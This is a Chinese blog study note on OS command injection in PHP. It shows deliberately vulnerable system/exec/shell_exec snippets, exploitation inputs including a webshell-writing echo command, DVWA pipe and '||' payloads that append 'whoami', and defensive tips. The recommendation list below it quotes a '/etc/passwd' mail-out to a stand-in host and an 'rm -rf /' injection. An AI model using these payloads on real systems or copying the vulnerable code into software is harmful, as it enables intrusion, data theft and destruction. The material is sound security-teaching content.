命令注入

最新推荐文章于 2024-01-20 14:20:22 发布
最新推荐文章于 2024-01-20 14:20:22 发布
阅读量145 收藏
点赞数
分类专栏: 命令注入 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zl52111/article/details/115666139
版权

os命令注入漏洞(command)

1.大致介绍:
如果我们开发的应用,特别是一些企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件)。当应用需要调用一些外部程序时就会用到一些系统命令的函数。应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入情况下,就会造成命令执行漏洞。

2.形成原因:
–用户输入作为拼接
–没有足够的过滤

3.漏洞危害:
–继承web服务器程序权限(web用户权限),去执行系统命令
–继承web服务器权限,读写文件
–反弹shell
–控制整个网站
–控制整个服务器

4.函数(比较典型的)
—system:能够将字符串作为os 命令执行,自带输出功能
简单例子:

 <?php
if($_GET['cmd']){
 $str=$_GET['cmd'];
   system($str);
}
?>

—exec:能够将字符串作为os 命令执行,需要输出执行结果(输出需要输入print)
简单例子:

 <?php
if($_GET['cmd']){
 $str=$_GET['cmd'];
 print exec($str);
}
?>

—shell_exec:和上边的一样
简单例子:

 <?php
if($_GET['cmd']){
 $str=$_GET['cmd'];
print   shell_exec($str);
}
?>

—passthru:和上边的一样 自带输出
简单例子:

 <?php
if($_GET['cmd']){
 $str=$_GET['cmd'];
   passthru($str);
}
?>

—popen:和上边一样 但是需要导入一个新的文件中 不会返回结果 会返回一个文件指针
简单例子:

 <?php
if($_GET['cmd']){
 $str=$_GET['cmd'];
   popen($str);
}
?>

在上边的url地址框上末尾加上>>1.txt (意思是将结果导入1.txt文件中)
—反引号``:和上边一样
简单例子:

 <?php
if($_GET['cmd']){
 $str=$_GET['cmd'];
 print  `$str`;
}
?>

5.漏洞利用
—查看系统文件:?cmd=type c:\windows\system32\drivers\etc\hosts
—显示当前路径:?cmd=cd
写文件:?cmd=echo" <?php phpinfo();?>">D:\php\www\shell.php(页面没有报错说明 文件写入成功).可以直接访问shelll.php查看)

6.防御方法:
—尽量减少命令执行函数的使用,并在disable_functions 中禁用
----在进入命令执行的函数或方法之前,对参数进行过滤
—参数的值尽量使用引号包裹,并在拼接前调用adds lashes进行转义

6.DVWA实例:
----low:

127.0.0.1|  whoami    
127.0.0.1|whoami      
127.0.0.1&&whoami
127.0.0.0.1||  whoami     (这是或的意思当前边出错时就会执行后边的命令)

在这里插入图片描述

----medium:

 127.0.0.1|  whoami   
 127.0.0.1|whoami   
 127.0.0.0.1||  whoami

----high

127.0.0.1|whoami
小亮酸Q糖
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
服务端安全之系统命令注入
好记性不如烂笔头
03-13 1094
原文出处:https://portswigger.net/web-security/os-command-injection 本节我们介绍什么是系统命令注入,描述这种漏洞如何发现以及如何利用,阐述在不同的操作系统上有用的命令和技术,以及总结如何阻止系统命令注入。 什么是命令注入 OS命令注入(也称为shell注入)是一种web安全问题,允许攻击者可以执行任意系统命令。 执行任意命令 考虑这样一个购物应用程序,它允许用户查看特定商店中的商品是否有货。该信息可以通过如下URL访问: https://insec
操作系统命令注入(OS command injection)学习笔记
汗的博客
05-06 5313
笔者burpsuite在线安全学院的OS command injection学习笔记。限于本人水平,笔记质量不是很高,假如有看到的大佬轻喷,很多地方是Google翻译的,还请多多包涵。 文章目录什么是OS命令注入?执行任意命令Lab: OS command injection, simple case有用的命令OS盲注使用时间延迟检测OS盲注Lab: Blind OS command inject...
【Web技术攻击】OS(Operating System)命令注入攻击
AC_greener的博客
05-06 2625
OS命令注入攻击是指通过Web应用,执行非法的操作系统命令达到攻击的目的OS注入攻击案例:以表单的发送功能为例,该功能可将用户的邮件按已填写的对方邮箱地址放过去。 攻击者将下面的值指定作为邮件地址: ; cat /etc/passwd | mail hack@example.jp 程序接收该值,构成以下的命令组合: “| /usr/sbin/sendmail ; cat /etc/passwd |
命令注入讲解ppt.pptx
08-10
命令注入讲解 命令注入是一种高危漏洞,指攻击者能够控制外部的参数达到随意执行系统命令的结果。命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞。 命令注入攻击...
python的常见命令注入威胁
12-25
不过下面可是我们开发产品初期的一些血淋淋的案例,更多的安全威胁可以看看北北同学的《python hack》PPT,里面提及了不只命令执行的威胁,那些都是我们亲身经历的代码。 千万要记得执行命令的时候,不要信任其他...
详解php命令注入攻击
01-20
这些函数在处理用户输入时如果不谨慎,就可能导致命令注入漏洞。例如,如果一个应用使用`system('ping ' . $user_input)`,而`$user_input`未经过滤,攻击者可以输入`127.0.0.1|rm -rf /`,这将导致系统执行`ping`...
php代码审计之命令注入(3)
01-09
在提供的代码片段中,`popen()` 用于读取命令的输出,但同样需要防止命令注入。 7. **pcntl_exec()**: `pcntl_exec()` 用于替换当前进程为指定的命令,主要用于多进程编程,不是直接接收用户输入的命令,所以不在...
什么是操作系统命令注入
Loser5的博客
03-24 2098
什么是操作系统命令注入? 操作系统命令注入(shell 注入)是一种 Web 安全漏洞,攻击者在运行应用程序的服务器上执行任意操作系统 命令,通常会完全破坏应用程序及其所有数据。很多时候,攻击者可以利用操作系统命令注入漏洞来破坏托管基础设施的其他部分,利用信任关系将攻击转向组织内的其他系统。 实验演示: 一.OS命令注入,简单案例 修改storeID参数,在数值后添加|whoami。 这里给出一些常用的系统命令(Linux+window) 二.具有时间延迟的盲操作系统命令注入 操作系统命令注入的许多实
【burpsuite安全练兵场-服务端4】操作系统命令注入-5个实验(全)
12-31 7395
【BP靶场portswigger-服务端4-操作系统命令注入】5个实验-千文详细步骤
网络安全系列之十一 系统命令注入攻击
weixin_33892359的博客
11-15 1735
系统命令注入攻击也是一种古老的攻击手段,是指黑客可以在有漏洞的页面地址栏中直接执行操作系统命令。下面将来演示这种攻击的实现方式,以及如何配置WAF进行拦截,实验环境仍然使用NPMserv搭建。 打开网站,在地址栏中的网址后面输入“?cmd=所要执行的命令”,如下图所示的http://192.168.1.3/?cmd=net user,可以发现命令能够成功...
命令注入(Command Injection)安全漏洞(SQL注入、LDAP注入、OS命令注入、XPath注入、JavaScript注入
Dontla的博客
07-12 896
这些命令注入漏洞都是由于应用程序没有正确地验证和过滤用户输入导致的。为了防止这些漏洞,应该始终对用户输入进行验证、过滤和转义,使用参数化查询或预编译语句,以及遵循最小权限原则。此外,定期进行安全审计和漏洞扫描,及时修复发现的漏洞也是非常重要的。
WEB安全基础-命令注入
IT1995的博客
01-22 5378
命令注入   命令:如DOS(关机,添加用户,运行某个文件等等等)命令和Bash命令 DOS:查看本地网络:ipconfig 查看当前系统用户:net user 查看目录:dir “./” 字符串查找: find “hello” ./test.txt   复合命名:echo hello &echo world 就会打印: Hello World   管道符|,前面命令的输
渗透测试-命令执行注入
lza20001103的博客
07-20 2992
渗透测试-命令执行注入
DVWA命令注入练习
Marsper的博客
11-11 296
DVWA命令注入练习 打开DVWA 难度先调为低级low 提交框中要求输入IP地址 首先尝试输入127.0.0.1进行测试,如下图 在尝试输入字符串whoami(肯定找不到的,因为没有这个域名)进行测试,如下图 以上两张图可知,此输入框中前面肯定有个ping命令。所以我们需要和谐前面的ping命令来进行注入。127.0.0.1的ip地址可以让ping命令和谐掉,然后执行分隔符(分隔符有很多种表示方法,例如&&,;,||,|,?,空格等很多)后面的命令进行注入。 输入命令127.0.0
burp靶场--操作系统命令注入
最新发布
qq_33168924的博客
01-20 540
【代码】burp靶场--操作系统命令注入
什么是命令注入命令注入如何避免?
热门推荐
llzhang_fly的博客
08-13 1万+
1、什么是命令注入 Command Injection,即命令注入攻击,是指由于嵌入式应用程序或者 web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。 在命令注入的漏洞中,最为常见的是PHP的命令注入。PHP命令注入攻击存在的主要原因是Web应用程序员在应用PHP语言中一些具有命令执行功能的函数时,对用户提交的数据内容没有进行严格的过滤就带入函...
Web安全:深入解析命令注入漏洞
"命令注入是一种高风险的安全漏洞,允许攻击者通过操纵参数执行系统命令。常见于Web应用中,利用不安全的用户输入调用系统命令。与远程代码执行(RCE)不同,命令注入专注于操作系统命令,而非编程代码。此漏洞主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值